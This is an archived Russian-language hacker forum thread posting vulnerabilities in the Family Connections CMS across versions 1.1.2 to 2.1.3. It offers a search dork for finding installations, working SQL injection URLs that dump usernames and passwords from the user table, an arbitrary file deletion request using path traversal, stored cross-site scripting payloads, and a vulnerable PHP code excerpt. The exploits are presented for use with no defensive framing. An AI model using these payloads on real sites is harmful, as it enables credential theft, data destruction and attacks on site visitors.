Family Connections 1.1.2 Multiply Vulns [Архив]

Просмотр полной версии : Family Connections 1.1.2 Multiply Vulns

_kREveDKo_2

04.07.2008, 22:53

Family Connections 1.1.2 Multiply Vulns

Author : n3v3rh00d, http://forum.antichat.ru

Download : http://rubyforge.org/frs/download.php/7989/familyconnection-1.1.2.tar.gz

Dork : intitle:"powered by Family Connections 1.1.2"

Bug Type 1 : Remote Sql-injection

POC's :

/gallery/index.php?uid=1&cid=-1+union+select+1,2,3,4,5,concat(username,char(64), password)+from+fcms_users/*&pid=1
/inc/familynews_comments.php?newsid=0+union+select+0,co ncat(username,char(64),password),2,3,4,5,6,7+from+ fcms_users/*
/addressbook.php?address=0+union+select+0,password, username,3,4,5,6,7,8,9,0,1,2,3,4+from+fcms_users/*
/addressbook.php?letter=0%27+union+select+0,1,2,3,c oncat(username,char(64),password),5+from+fcms_user s/*
/home.php?action=results&poll_id=0+union+select+0,1,2,concat(username,char( 64),password),4+from+fcms_users/*

Bug Type 2 : Arbitrary file delete

POC :

/inc/upimages.php
POST: delimg=&img=../../index.php

[x60]unu

27.01.2010, 20:15

Family Connections (FCMS)
site : www.familycms.com/
version cms : 2.1.2 (FCMS 2.1.2)
download : www.familycms.com/downloads/index.php

Active XSS
1. (тело письма) -- отправляем письмо пользователю с заголовком ( "><script>alert()</script> )
2.messageboard.php -- в теме отправляем сообщение --- ("><script>alert(/xss/);</script>) условие (кто будет отвечать после сообщения со скриптом или просто "Reply" попадется на xss)

SQL Injection
1. -- profile.php
http://localhost/profile.php?member=[...][sql]
2. -- calendar.php
http://localhost/calendar.php?entry=[...][sql]
3. -- messageboard.php
http://localhost/messageboard.php?thread=1[...][sql]
4. -- index.php
http://localhost/gallery/index.php?uid=[..]&cid=[..]&pid=[..]sql
5. -- privatemsg.php
http://localhost/privatemsg.php?pm=[..][sql]

0x0.Injector

21.02.2010, 19:56

FCMS
version : 2.1.3
download : www.familycms.com/downloads/index.php

ошибки которые остались после version 2.1.2 см. выше

Active XSS
[+] 1. При отправлении письма пользователю
[+] 2. messageboard.php отправление сообщений сообщение

SQL inj
[+] 1. profile.php
[+] 2. calendar.php
[+] 3. messageboard.php
[+] 4. gallery
[+] 5. privatemsg.php

Итак уязвимости найденные мною в версии 2.1.3

SQL inj
familynews_comments.php
Code :
$show = true;
$news_id = $_GET['newsid'];

// Add Comment
if (isset($_POST['addcom'])) {
$com = ltrim($_POST['comment']);
if (!empty($com)) {
$sql = "INSERT INTO `fcms_news_comments`
(`news`, `comment`, `date`, `user`)
VALUES
($news_id, '" . addslashes($com) . "', NOW(), " . $_SESSION['login_id'] . ")";
mysql_query($sql) or displaySQLError(
'Comment Error', __FILE__ . ' [' . __LINE__ . ']', $sql, mysql_error()
);
}
}
http://hello/inc/familynews_comments.php?newsid=1

Active XSS
recipes.php добавляем с названием '"/><script>alert("ehaha");</script>
documents.php новый документ, описание '"/><script>alert("ehaha");</script>